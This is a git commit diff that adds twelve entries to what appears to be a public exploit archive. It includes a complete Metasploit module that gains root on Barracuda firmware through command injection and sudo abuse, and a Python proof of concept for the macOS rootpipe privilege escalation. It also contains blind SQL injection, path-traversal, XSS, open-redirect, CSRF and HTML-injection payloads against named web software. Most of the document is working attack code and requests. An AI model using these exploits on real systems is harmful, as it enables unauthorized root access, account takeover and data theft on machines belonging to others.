DB: 2015-04-11

12 new exploits
2015-04-11 08:36:20 +00:00 · 2015-04-11 08:36:20 +00:00 · 223a30662a
commit 223a30662a
parent 0607d0429f
13 changed files with 656 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -32991,6 +32991,7 @@ id,file,description,date,author,platform,type,port
 36572,platforms/php/webapps/36572.txt,"Toner Cart 'show_series_ink.php' SQL Injection Vulnerability",2012-01-18,Lazmania61,php,webapps,0
 36573,platforms/php/webapps/36573.txt,"MMORPG Zone 'view_news.php' SQL Injection Vulnerability",2012-01-18,Lazmania61,php,webapps,0
 36574,platforms/php/webapps/36574.txt,"Freelance Zone 'show_code.php' SQL Injection Vulnerability",2012-01-18,Lazmania61,php,webapps,0
+36576,platforms/php/webapps/36576.txt,"WordPress SP Project & Document Manager 2.5.3 - Blind SQL Injection",2015-03-31,Catsecurity,php,webapps,0
 36577,platforms/multiple/remote/36577.py,"Airties Air5650TT - Remote Stack Overflow",2015-03-31,"Batuhan Burakcin",multiple,remote,0
 36579,platforms/windows/remote/36579.rb,"Adobe Flash Player ByteArray With Workers Use After Free",2015-03-31,metasploit,windows,remote,0
 36580,platforms/windows/webapps/36580.rb,"Palo Alto Traps Server 3.1.2.1546 - Persistent XSS Vulnerability",2015-03-31,"Michael Hendrickx",windows,webapps,0
@ -33043,6 +33044,7 @@ id,file,description,date,author,platform,type,port
 36630,platforms/php/webapps/36630.txt,"Joomla 'com_products' Component Multiple SQL Injection Vulnerabilities",2012-01-26,the_cyber_nuxbie,php,webapps,0
 36631,platforms/php/webapps/36631.txt,"WordPress Slideshow Gallery Plugin 1.1.x 'border' Parameter Cross Site Scripting Vulnerability",2012-01-26,"Bret Hawk",php,webapps,0
 36632,platforms/php/webapps/36632.txt,"xClick Cart 1.0.x 'shopping_url' Parameter Cross Site Scripting Vulnerability",2012-01-26,sonyy,php,webapps,0
+36633,platforms/linux/dos/36633.txt,"Wireshark - Buffer Underflow and Denial of Service Vulnerabilities",2012-01-10,"Laurent Butti",linux,dos,0
 36634,platforms/php/webapps/36634.txt,"Joomla! 'com_visa' Component Local File Include and SQL Injection Vulnerabilities",2012-01-28,the_cyber_nuxbie,php,webapps,0
 36635,platforms/php/webapps/36635.txt,"Joomla! 'com_firmy' Component 'Id' Parameter SQL Injection Vulnerability",2012-01-30,the_cyber_nuxbie,php,webapps,0
 36638,platforms/php/webapps/36638.txt,"Joomla! 'com_crhotels' Component 'catid' Parameter Remote SQL Injection Vulnerability",2012-01-31,the_cyber_nuxbie,php,webapps,0
@ -33074,6 +33076,7 @@ id,file,description,date,author,platform,type,port
 36666,platforms/java/webapps/36666.txt,"ManageEngine ADManager Plus 5.2 Build 5210 DomainConfig.do operation Parameter XSS",2012-02-07,LiquidWorm,java,webapps,0
 36667,platforms/java/webapps/36667.txt,"ManageEngine ADManager Plus 5.2 Build 5210 jsp/AddDC.jsp domainName Parameter XSS",2012-02-07,LiquidWorm,java,webapps,0
 36668,platforms/php/webapps/36668.txt,"eFront 3.6.10 'administrator.php' Cross Site Scripting Vulnerability",2012-02-07,"Chokri B.A",php,webapps,0
+36669,platforms/linux/dos/36669.txt,"Apache APR 1.4.x - Hash Collision Denial Of Service Vulnerability",2012-01-05,"Moritz Muehlenhoff",linux,dos,0
 36670,platforms/hardware/remote/36670.txt,"D-Link ShareCenter Products Multiple Remote Code Execution Vulnerabilities",2012-02-08,"Roberto Paleari",hardware,remote,0
 36671,platforms/php/webapps/36671.txt,"WordPress All In One WP Security & Firewall 3.9.0 SQL Injection Vulnerability",2015-04-08,"Claudio Viviani",php,webapps,80
 36672,platforms/lin_x86/shellcode/36672.asm,"Shellcode: Linux x86 Egg-hunter (20 bytes)",2015-04-08,"Paw Petersen",lin_x86,shellcode,0
@ -33088,3 +33091,12 @@ id,file,description,date,author,platform,type,port
 36681,platforms/multiple/remote/36681.txt,"Apache MyFaces 'ln' Parameter Information Disclosure Vulnerability",2012-02-09,"Paul Nicolucci",multiple,remote,0
 36682,platforms/php/dos/36682.php,"PHP PDORow Object Remote Denial Of Service Vulnerability",2011-09-24,anonymous,php,dos,0
 36683,platforms/php/webapps/36683.txt,"Dolibarr 3.x 'adherents/fiche.php' SQL Injection Vulnerability",2012-02-10,"Benjamin Kunz Mejri",php,webapps,0
+36684,platforms/java/webapps/36684.txt,"LxCenter Kloxo 6.1.10 Multiple HTML Injection Vulnerabilities",2012-02-10,anonymous,java,webapps,0
+36685,platforms/php/webapps/36685.txt,"CubeCart <= 3.0.20 Multiple Script redir Parameter Arbitrary Site Redirect",2012-02-10,"Aung Khant",php,webapps,0
+36686,platforms/php/webapps/36686.txt,"CubeCart <= 3.0.20 admin/login.php goto Parameter Arbitrary Site Redirect",2012-02-10,"Aung Khant",php,webapps,0
+36687,platforms/php/webapps/36687.txt,"CubeCart <= 3.0.20 switch.php r Parameter Arbitrary Site Redirect",2012-02-10,"Aung Khant",php,webapps,0
+36688,platforms/php/webapps/36688.html,"Zen Cart 1.3.9h 'path_to_admin/product.php' Cross Site Request Forgery Vulnerability",2012-02-10,DisK0nn3cT,php,webapps,0
+36689,platforms/linux/webapps/36689.txt,"BOA Web Server 0.94.8.2 - Arbitrary File Access",2000-12-19,llmora,linux,webapps,0
+36690,platforms/linux/remote/36690.rb,"Barracuda Firmware <= 5.0.0.012 reporting Post Auth Remote Root",2015-04-09,xort,linux,remote,8000
+36692,platforms/osx/local/36692.py,"Mac OS X rootpipe Local Privilege Escalation",2015-04-09,"Emil Kvarnhammar",osx,local,0
+36693,platforms/php/webapps/36693.txt,"RabbitWiki 'title' Parameter Cross Site Scripting Vulnerability",2012-02-10,sonyy,php,webapps,0
--- a/platforms/java/webapps/36684.txt
+++ b/platforms/java/webapps/36684.txt
@ -0,0 +1,49 @@
+source: http://www.securityfocus.com/bid/51964/info
+
+LxCenter Kloxo is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Kloxo 6.1.0 is vulnerable; other versions may be affected. 
+
+Proof of Concept:
+=================
+The vulnerabilities can be exploited by remote attackers with medium required user inter action. For demonstration or reproduce ...
+
+1.1
+Localhost {Command Center}
+
+<script> global_need_list = new Array(); </script><script> global_match_list = new Array(); </script><script> global_desc_list = new Array(); </script><form onsubmit=``return check_for_needed_variables(`command_centerlocalhost`);``
+method=``post`` enctype=``multipart/form-data`` action=``/display.php`` id=``command_centerlocalhost`` name=``command_centerlocalhost``> <fieldset style=``background-color: rgb(255, 255, 255); border: 0px none; padding: 10px;`` width=``90%``><legend style=``
+font-weight: normal; border: 0px none;``><font color=``#303030``
+style=``font-weight: bold;``>Command Center for localhost
+</font> </legend></fieldset>   <div align=``left``
+style=``background-color: rgb(255, 255, 255); width: 90%;``><div align=`` left`` style=``width: 500px; border: 1px solid rgb(177, 192, 240);``><input type=``hidden`` value=``pserver`` name=``frm_o_o[0][class]``/>
+  <input type=``hidden`` value=``localhost`` name=``frm_o_o[0][nname]``/>
+  <div align=``left`` style=``padding: 10px; background-color: rgb(250, 248, 248); display: block;``> Command  <br/> ... or <input width=``60%`` type=``text`` value=`` name=``frm_pserver_c_ccenter_command``
+class=``frm_pserver_c_ccenter_command textbox``/> <iframe size=``30`` <``=`` [PERSISTENT SCRIPT CODE INJECT!]` src=``a``> </div> <div align=left style=`padding:10 10 10 10 ;border-top :1px solid #aaaaaa; background-color:#ffffff;display:block` > Output <br> <textarea nowrap  id=textarea_ class= frmtextarea rows=10 style=`margin:0 0 0 50;width:85%;height:200px;` name=`` size=30  >&lt;/textarea&gt; <script type=``text/javascript``>createTextAreaWithLines(`textarea_`);</script>
+<style>
+
+
+1.2
+Server => Information => 2 x Verbose Input
+
+<font color=``#303030`` style=``font-weight: bold;``>Information for
+localhost   </font> </legend></fieldset>
+<div align=``left`` style=``background-color: rgb(255, 255, 255); width:
+90%;``><div align=``left`` style=``width: 500px; border: 1px solid rgb(177, 192, 240);``><input type=``hidden`` value=``pserver`` name=``frm_o_o[0][class]``/>
+  <input type=``hidden`` value=``localhost`` name=``frm_o_o[0][nname]``/>
+  <script> global_need_list[`frm_pserver_c_description`] = `Verbose Description (to Identify)`; </script> <div align=``left`` style=``padding: 10px; background-color: rgb(250, 248, 248); display: block;``> Verbose Description (to Identify) <font color=``red``><sup>*</sup></font> <br/> <input width=``60%`` type=``text`` [PERSISTENT SCRIPT CODE INJECT!]`` <iframe=`` value=``
+>`` name=``frm_pserver_c_description`` class=``frm_pserver_c_description
+textbox``/>``  size=``30``> </div> <div align=``left`` style=``
+padding: 10px; border-top: 1px solid rgb(170, 170, 170);
+background-color: rgb(255, 255, 255); display: block;``> FQDN Hostname <br/>
+
+<input width=``60%`` type=``text`` [PERSISTENT SCRIPT CODE INJECT!]`` <iframe=`` value=``>`` name=``frm_pserver_c_realhostname`` class=`` frm_pserver_c_realhostname textbox``/>``  size=``30``> </div> <div align=``left`` style=``padding: 10px; border-top: 1px solid rgb(170, 170, 170); background-color: rgb(250, 248, 248); display: block;``> Load Threshold At Which Warning Is Sent  <br/> <input width=``60%`` type=``text`` size=``30`` value=``20`` name=``frm_pserver_c_load_threshold``
+class=``frm_pserver_c_load_threshold textbox``/> </div> <input type= ``hidden`` value=``update`` name=``frm_action``/>
+  <input type=``hidden`` value=``information`` name=``frm_subaction``/>
+
+
+Reference(s):
+                 ../command-center.txt
+                 ../server-verbose-input.txt
--- a/platforms/linux/dos/36633.txt
+++ b/platforms/linux/dos/36633.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51710/info
+
+Wireshark is prone to a buffer-underflow vulnerability and multiple denial-of-service vulnerabilities.
+
+Remote attackers can exploit these issues to execute arbitrary code in the context of the application or cause denial-of-service conditions.
+
+Wireshark versions 1.4.0 through 1.4.10 and 1.6.0 through 1.6.4 are vulnerable. 
+
+http://www.exploit-db.com/sploits/36633.zip
--- a/platforms/linux/dos/36669.txt
+++ b/platforms/linux/dos/36669.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/51917/info
+
+Apache APR is prone to a denial-of-service vulnerability.
+
+An attacker can exploit this issue by sending specially crafted forms in HTTP POST requests.
+
+http://www.exploit-db.com/sploits/36669.zip
--- a/platforms/linux/remote/36690.rb
+++ b/platforms/linux/remote/36690.rb
@ -0,0 +1,302 @@
+# Exploit Title: Barracuda Firmware <= 5.0.0.012 Post Auth Remote Root exploit
+# Exploit Author: xort
+# Vendor Homepage: https://www.barracuda.com/
+# Software Link: https://www.barracuda.com/products/webfilter
+# Version: Firmware <= 5.0.0.012 
+# Tested on: Vx and Hardware platforms 
+#
+# Postauth remote root in Barracuda Firmware <= 5.0.0.012 for any under priviledged user with report generating
+# capablities. This exploit leverages a command injection bug along with poor sudo permissions to obtain
+# root. xort@blacksecurity.org
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+	include  Exploit::Remote::Tcp
+        include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Barracuda Firmware <= 5.0.0.012 reporting Post Auth Remote Root',
+					'Description'    => %q{
+					This module exploits a remote command execution vulnerability in
+				the Barracuda Firmware Version <= 5.0.0.012 by exploiting a
+				vulnerability in the web administration interface.
+					By sending a specially crafted request it's possible to inject system
+				 commands while escalating to root do to relaxed sudo configuration on the local 
+				machine.
+			},
+			'Author'         =>
+				[
+					'xort', # metasploit module
+				],
+			'Version'        => '$Revision: 12345 $',
+			'References'     =>
+				[
+					[ 'none', 'none'],
+				],
+			'Platform'      => [ 'linux'],
+			'Privileged'     => true,
+			 'Arch'          => [ ARCH_X86 ],
+                        'SessionTypes'  => [ 'shell' ],
+                        'Privileged'     => false,
+
+		        'Payload'        =>
+                                { # note: meterpreter can't run on host do to kernel 2.4 incompatabilities + this is stable 
+                                  'Compat' =>
+                                  {
+                                        'ConnectionType' => 'find',
+                                  }
+                                },
+
+			'Targets'        =>
+				[
+					['Linux Universal',
+						{
+								'Arch' => ARCH_X86,
+								'Platform' => 'linux'
+						}
+					],
+				],
+			'DefaultTarget' => 0))
+
+			register_options(
+				[
+					OptString.new('PASSWORD', [ false, 'Device password', "" ]),	
+					OptString.new('ET', [ false, 'Device password', "" ]),
+			         	OptString.new('USERNAME', [ true, 'Device password', "admin" ]),	
+					OptString.new('CMD', [ false, 'Command to execute', "" ]),	
+					Opt::RPORT(8000),
+				], self.class)
+	end
+
+	def do_login(username, password, et)
+		vprint_status( "Logging into machine with credentials...\n" )
+		
+	      # timeout
+		timeout = 1550;
+
+		# params
+                password_clear = "admin"
+		real_user = "";
+		login_state = "out"
+		enc_key = Rex::Text.rand_text_hex(32)
+   		et = "1358817515"
+		locale = "en_US"
+		user = username
+		password = Digest::MD5.hexdigest(username+enc_key) 
+		enctype = "MD5"
+		password_entry = ""
+		
+		
+		vprint_status( "Starting first routine...\n" )
+
+                data = "real_user=#{real_user}&login_state=#{login_state}&enc_key=#{enc_key}&et=#{et}&locale=#{locale}&user=#{user}&password=#{password}&enctype=#{enctype}&password_entry=#{password_entry}&password_clear=#{password_clear}&Submit=Login"
+	
+		vprint_status( "#{data}\n" )
+		
+	        res = send_request_cgi(
+      	        {
+                      'method'  => 'POST',
+                      'uri'     => "/cgi-mod/index.cgi",
+                      'cookie'  => "",
+		      'data'    => data
+               }, timeout)
+
+
+		vprint_status( "login got code: #{res.code} ... continuing to second request..." )
+		File.open("/tmp/output2", 'w+') {|f| f.write(res.body) }
+
+		# get rid of first yank 
+		password = res.body.split('\n').grep(/(.*)id=\"password\" value=\"(.*)\"/){$2}[0] #change to match below for more exact result
+		et = res.body.split('\n').grep(/(.*)id=\"et\" value=\"([^\"]+)\"/){$2}[0]
+
+		vprint_status( "password got back = #{password} - et got back = #{et}\n" )
+
+		return password, et
+	end
+
+	def run_command(username, password, et, cmd)
+		vprint_status( "Running Command...\n" )
+
+	 	exploitreq = [
+		[ "primary_tab", "BASIC" ],
+		[ "secondary_tab","reports" ],
+		[ "realm","" ],
+		[ "auth_type","Local" ],
+		[ "user", username ],
+		[ "password", password  ],
+		[ "et",et ],
+		[ "role","" ],
+		[ "locale","en_US" ],
+		[ "q","" ],
+		[ "UPDATE_new_report_time_frame","custom" ],
+		[ "report_start","2013-01-25 01:14" ],
+		[ "report_end","2013-01-25 02:14" ],
+		[ "type","" ],
+		[ "ntlm_server","" ],
+		[ "kerb_server","" ],
+		[ "local_group","changeme" ],           
+		[ "ip_group","20.20.108.0/0.0.0.0" ],  
+		[ "ip_address__0","" ],
+		[ "ip_address__1","" ],
+		[ "ip_address__2","" ],
+		[ "ip_address__3","" ],
+		[ "netmask__0","" ],
+		[ "netmask__1","" ],
+		[ "netmask__2","" ],
+		[ "netmask__3","" ],
+		[ "UPDATE_new_report_pattern_values","" ],
+		[ "UPDATE_new_report_pattern_text","" ],
+		[ "UPDATE_new_report_filter_destination","domain" ],
+		[ "filter_domain","" ],
+		[ "UPDATE_new_report_filter_domain","" ],
+		[ "UPDATE_new_report_filter_category","" ],
+		[ "UPDATE_new_report_exclude_from","" ],
+		[ "UPDATE_new_report_exclude_to","" ],
+		[ "UPDATE_new_report_exclude_days","" ],
+		[ "allow","allow" ],
+		[ "block","block" ],
+		[ "warn","warn" ],
+		[ "monitor","monitor" ],
+		[ "UPDATE_new_report_filter_actions","allow,block,warn,monitor" ],
+		[ "UPDATE_new_report_filter_count","10" ],
+		[ "UPDATE_new_report_chart_type","vbar" ],
+		[ "UPDATE_new_report_format","html" ],
+		[ "DEFAULT_new_report_group_expand","No" ],
+		[ "UPDATE_new_report_expand_user_count","5" ],
+		[ "UPDATE_new_report_expand_domain_count","5" ],
+		[ "UPDATE_new_report_expand_cat_count","5" ],
+		[ "UPDATE_new_report_expand_url_count","5" ],
+		[ "UPDATE_new_report_expand_threat_count","5" ],
+		[ "report","on" ],
+		[ "UPDATE_new_report_name", Rex::Text.rand_text_alphanumeric(10) ],
+		[ "UPDATE_new_report_id","" ],
+		[ "UPDATE_new_report_enabled","Yes" ],
+		[ "secondary_scope","report" ],
+		[ "secondary_scope_data","" ],
+		[ "UPDATE_new_report_reports","sessions_by_user,infection_activity" ],
+		[ "UPDATE_new_report_delivery","external" ],
+		[ "UPDATE_new_report_delivery_dest_email","" ],
+		[ "UPDATE_new_report_server","new" ],
+		[ "UPDATE_new_external_server_type","smb" ],
+		[ "UPDATE_new_external_server_alias", Rex::Text.rand_text_alphanumeric(10) ],
+		[ "UPDATE_new_external_server","4.4.4.4" ],
+		[ "UPDATE_new_external_server_port","445" ],
+		[ "UPDATE_new_external_server_username","\"` #{cmd} `\"" ],
+		[ "UPDATE_new_external_server_password","asdf" ],
+		[ "UPDATE_new_external_server_path","/"+ Rex::Text.rand_text_alphanumeric(15) ],
+		[ "UPDATE_new_report_frequency", "once" ],
+		[ "UPDATE_new_report_split", "no" ],
+		[ "add_report_id","Apply" ],
+		[ "remover","" ] 
+		]
+
+		
+	        data = Rex::MIME::Message.new
+		data.bound = "---------------------------" + Rex::Text.rand_text_numeric(30)
+	
+		exploitreq.each do |xreq|
+       	 	    data.add_part(xreq[1], nil, nil, "form-data; name=\"" + xreq[0] + "\"")
+		end
+
+        	post_data = data.to_s
+	        post_data = post_data.gsub(/\r\n---------------------------/, "---------------------------")		
+
+		datastore['UserAgent'] = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0"
+
+		vprint_status( "sending..." )
+	        res = send_request_cgi({
+         	   'method' => 'POST',
+	           'uri'    => "/cgi-mod/index.cgi",
+       		   'ctype'  => "multipart/form-data; boundary=#{data.bound}",
+            	   'data'   => post_data,
+		   'headers' => 
+			{
+				'Accept' => "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
+				'Accept-Language' => "en-US,en;q=0.5"
+			}
+	        })	
+
+		if res.code == 200
+			vprint_status( "You can now reuse the login params you were supplied to avoid the lengthy wait at the exploits initial launch.... \n" )
+			vprint_status( "password: #{password} et: #{et}\n" )
+		end
+
+
+		vprint_status( "login got code: #{res.code} from report_results.cgi\n" )
+		File.open("/tmp/output4", 'w+') {|f| f.write(res.body) }
+	end
+
+	def run_script(username, password, et, cmds)
+	  	vprint_status( "running script...\n")
+	  
+	  
+	end
+	
+	def exploit
+		# timeout
+		timeout = 1550;
+
+		user = "admin"
+		
+		# params
+                real_user = "";
+		login_state = "out"
+                et = "1358817515" #epoch time
+		locale = "en_US"
+		user = "admin"
+		password = ""
+		enctype = "MD5"
+		password_entry = ""
+		password_clear = "admin"
+		
+                vprint_status("<- Encoding payload to elf string...")
+                elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
+                encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\\\\\\\\\x\1\2') # extra escaping to get passed down correctly
+
+		if not datastore['PASSWORD'].nil? and not datastore['PASSWORD'].empty?
+
+			password_clear = "admin"
+			password = datastore['PASSWORD']
+			et = datastore['ET'] 
+
+                # else - if no 'CMD' string - add code for root shell
+                else   
+
+			password, et = do_login(user, password, et)
+			vprint_status("new password: #{password}\n")
+		end
+
+		sleep(5)
+
+		if not datastore['CMD'].nil? and not datastore['CMD'].empty?
+			cmd = datastore['CMD']	
+		end
+
+		run_command(user, password, et, cmd)
+		
+		# create elf in /tmp, abuse sudo to overwrite another command we have sudo access to (tar), then execute with sudo perm
+		cmd =  "echo -ne #{encoded_elf} > /tmp/x ;"
+		cmd += "chmod +x /tmp/x ;"
+
+		# backup static_routes file
+		cmd += "cp -f /home/product/code/config/static_routes /tmp/zzz"
+		cmd += "sudo cp -f /bin/sh /home/product/code/config/static_routes"
+	
+		# execute elf as root 
+		cmd += "sudo /home/product/code/config/static_routes -c /tmp/x ;"
+
+		# restore static_routes file
+		cmd += "cp -f /tmp/zzz /home/product/code/config/static_routes"
+		
+		
+		run_command(user, password, et, cmd)
+		sleep(2)
+		handler
+		sleep(5)
+		
+	end
+
+end
--- a/platforms/linux/webapps/36689.txt
+++ b/platforms/linux/webapps/36689.txt
@ -0,0 +1,109 @@
+###############################################################
+ID: S21SEC-005-en
+Title: Vulnerability in BOA web server v0.94.8.2
+Date: 03/10/2000
+Status: Vendor contacted, patch available
+Scope: Arbitrary file access
+Platforms: Unix
+Author: llmora
+Location: http://www.s21sec.com/en/avisos/s21sec-005-en.txt
+Release: Public
+###############################################################
+
+				S 2 1 S E C
+
+			 http://www.s21sec.com
+
+	Vulnerability in BOA web server v0.94.8.2
+
+
+There is a security bug in BOA v0.94.8.2 that allows a malicious
+user to access files outside the document root of the web server
+as the user the server runs as.
+
+About BOA
+---------
+
+Boa is an open source high performance web server for Unix-alike
+computers (http://www.boa.org). It does file serving and dynamic
+content generation via CGI.
+
+Vulnerability description
+-------------------------
+
+- Reading any file in the web server
+
+The boa web server suffers of the well-known "../.." web server
+problem. If we request a document from the web server,
+using the "../.." technique, we get:
+
+homer:~$ telnet ilf 80
+Escape character is '^]'.
+GET /../../../../../../../../../../../etc/motd HTTP/1.0
+
+HTTP/1.0 404 Not Found
+
+<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD>
+<BODY><H1>404 Not Found</H1>
+The requested URL /etc/motd was not found on this server.
+</BODY></HTML>
+Connection closed by foreign host.
+homer:~$
+
+So apparently it doesn't work, as boa checks for "/.." in the path.
+
+By URL-encoding the "." in the request, we are able to skip the ".." test,
+allowing us to access the contents of any file the user running the
+web server has access to:
+
+homer:~$ telnet ilf 80
+GET
+/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2
+E/etc/motd HTTP/1.0
+
+HTTP/1.0 200 OK
+
+[... the /etc/motd file content is shown]
+
+Connection closed by foreign host.
+homer:~$
+
+If the administrator enables extension based CGI support with a line like
+this in the boa.conf file:
+
+AddType application/x-httpd-cgi cgi
+
+then a request for a file ending in .cgi will result in the file being
+executed with the privileges of the user id running the web server. This
+file can be placed in any folder throughout the file system, not strictly
+under the DocumentRoot, and be accessed using the previous bug, leading
+to the web server account compromise.
+
+Affected versions
+-----------------
+
+This bug has been tested and verified to be present in v0.94.8.2 of the boa
+web server. Version 0.92 of boa is not affected by this problem.
+
+Fix information
+---------------
+
+The boa development team has released v0.94.8.3 which fixes this
+vulnerability.
+Upgrades are available at the vendor website (http://www.boa.org).
+
+S21SEC wishes to thank the boa development team for acknowledging the issue
+and releasing a security patch in a matter of hours.
+
+Additional information
+----------------------
+
+This vulnerability was found and researched by:
+
+ Lluis Mora		llmora@s21sec.com
+
+You can find the latest version of this advisory at:
+
+	http://www.s21sec.com/en/avisos/s21sec-005-en.txt
+
+And other S21SEC advisories at http://www.s21sec.com/en/avisos/
--- a/platforms/osx/local/36692.py
+++ b/platforms/osx/local/36692.py
@ -0,0 +1,73 @@
+########################################################
+#
+#  PoC exploit code for rootpipe (CVE-2015-1130)
+#
+#  Created by Emil Kvarnhammar, TrueSec
+#
+#  Tested on OS X 10.7.5, 10.8.2, 10.9.5 and 10.10.2
+#
+########################################################
+import os
+import sys
+import platform
+import re
+import ctypes
+import objc
+import sys
+from Cocoa import NSData, NSMutableDictionary, NSFilePosixPermissions
+from Foundation import NSAutoreleasePool
+
+def load_lib(append_path):
+    return ctypes.cdll.LoadLibrary("/System/Library/PrivateFrameworks/" + append_path);
+
+def use_old_api():
+    return re.match("^(10.7|10.8)(.\d)?$", platform.mac_ver()[0])
+
+
+args = sys.argv
+
+if len(args) != 3:
+    print "usage: exploit.py source_binary dest_binary_as_root"
+    sys.exit(-1)
+
+source_binary = args[1]
+dest_binary = os.path.realpath(args[2])
+
+if not os.path.exists(source_binary):
+    raise Exception("file does not exist!")
+
+pool = NSAutoreleasePool.alloc().init()
+
+attr = NSMutableDictionary.alloc().init()
+attr.setValue_forKey_(04777, NSFilePosixPermissions)
+data = NSData.alloc().initWithContentsOfFile_(source_binary)
+
+print "will write file", dest_binary
+
+if use_old_api():
+    adm_lib = load_lib("/Admin.framework/Admin")
+    Authenticator = objc.lookUpClass("Authenticator")
+    ToolLiaison = objc.lookUpClass("ToolLiaison")
+    SFAuthorization = objc.lookUpClass("SFAuthorization")
+
+    authent = Authenticator.sharedAuthenticator()
+    authref = SFAuthorization.authorization()
+
+    # authref with value nil is not accepted on OS X <= 10.8
+    authent.authenticateUsingAuthorizationSync_(authref)
+    st = ToolLiaison.sharedToolLiaison()
+    tool = st.tool()
+    tool.createFileWithContents_path_attributes_(data, dest_binary, attr)
+else:
+    adm_lib = load_lib("/SystemAdministration.framework/SystemAdministration")
+    WriteConfigClient = objc.lookUpClass("WriteConfigClient")
+    client = WriteConfigClient.sharedClient()
+    client.authenticateUsingAuthorizationSync_(None)
+    tool = client.remoteProxy()
+
+    tool.createFileWithContents_path_attributes_(data, dest_binary, attr, 0)
+
+
+print "Done!"
+
+del pool
--- a/platforms/php/webapps/36576.txt
+++ b/platforms/php/webapps/36576.txt
@ -0,0 +1,41 @@
+# Exploit Title: WordPress SP Project & Document Manager 2.5.3 Blind SQL Injection
+# Google Dork: inurl:wp-content/plugins/sp-client-document-manager
+# Date: 2015-03-04
+# Exploit Author: catsecurity
+# Vendor Homepage: http://smartypantsplugins.com
+# Software Link: https://downloads.wordpress.org/plugin/sp-client-document-manager.2.5.3.zip
+# Version: version 2.5.3 and previous version
+# Tested on: Chrome (It's PHP Application)
+# CVE : N/A
+
+
+# Timeline #
+[2015.03.05] Reported to the Vendor
+[2015.03.06?] Fixed in Update 2.5.4
+
+ 
+# Details #
+
+- This vulnerability did not process integer parameters. Unauthorized users can attact the webstites that use this plugin.
+- Vulnerability code in the thumbnails() function which exists in the [ /wp-content/plugins/sp-client-document-manager/ajax.php ].
+- "pid" variable is not sanitized
+
+
+# Vulnerable code #
+
+Line 1132:        echo '<div id="dlg_cdm_thumbnails">';
+Line 1133:        if ($_GET['pid'] != "") {
+Line 1134:            $r_current_project = $wpdb->get_results("SELECT *  FROM " . $wpdb->prefix . "sp_cu_project  WHERE id = " . $_GET['pid'] . "", ARRAY_A);
+Line 1135:        }
+
+
+# POC #
+/wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=thumbnails&pid=[SQLi]
+
+example:
+/wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=thumbnails&pid=if(substr(database(),1,1)=0x61,sleep(5),1)
+
+if yes it will sleep 5 seconds.
+
+
+This vulnerable parameters must trance to integer
--- a/platforms/php/webapps/36685.txt
+++ b/platforms/php/webapps/36685.txt
@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/51966/info
+
+CubeCart is prone to a URI-redirection vulnerabilities because the application fails to properly sanitize user-supplied input.
+
+A successful exploit may aid in phishing attacks; other attacks are possible.
+
+CubeCart 3.0.20 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/cube/index.php?act=login&redir=Ly95ZWhnLm5ldC8%3D
+http://www.example.com/cube/cart.php?act=reg&redir=L2N1YmUvaW5kZXgucGhwP2FjdD1sb2dpbg%3D%3D 
--- a/platforms/php/webapps/36686.txt
+++ b/platforms/php/webapps/36686.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51966/info
+ 
+CubeCart is prone to a URI-redirection vulnerabilities because the application fails to properly sanitize user-supplied input.
+ 
+A successful exploit may aid in phishing attacks; other attacks are possible.
+ 
+CubeCart 3.0.20 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/cube3.0.20/admin/login.php?goto=//yehg.net
--- a/platforms/php/webapps/36687.txt
+++ b/platforms/php/webapps/36687.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51966/info
+  
+CubeCart is prone to a URI-redirection vulnerabilities because the application fails to properly sanitize user-supplied input.
+  
+A successful exploit may aid in phishing attacks; other attacks are possible.
+  
+CubeCart 3.0.20 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/cube3.0.20/switch.php?r=//yehg.net/&lang=es 
--- a/platforms/php/webapps/36688.html
+++ b/platforms/php/webapps/36688.html
@ -0,0 +1,19 @@
+source: http://www.securityfocus.com/bid/51968/info
+
+Zen Cart is prone to a cross-site request-forgery vulnerability.
+
+Exploiting this issue may allow a remote attacker to perform certain administrative actions and gain unauthorized access to the affected application. Other attacks are also possible.
+
+Zen Cart 1.3.9h is vulnerable; other versions may be affected.
+
+<form name="products" action="
+http://www.example.com/path_to_admin/product.php?action=delete_product_confirm";
+method="post">
+<label for="securityToken">Security Token</label><br/><input type="text"
+name="securityToken" value="Can be anything?" /><br/><br/>
+<label for="products_id">Products ID</label><br/><input type="text"
+name="products_id" value="329"><br/><br/>
+<label for="product_categories[]">Products Category</label><br/><input
+type="text" value="48" name="product_categories[]"><br/><br/>
+<input type="submit" border="0" alt="Delete" value=" Delete Product">
+</form>
--- a/platforms/php/webapps/36693.txt
+++ b/platforms/php/webapps/36693.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/51971/info
+
+RabbitWiki is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. 
+
+http://www.example.com/webmasters/s/RabbitWiki/index.php?title=%22%3E\%3Cscript%3Ealert%28%22rabbit%20says:hello%22%29%3C/script%3E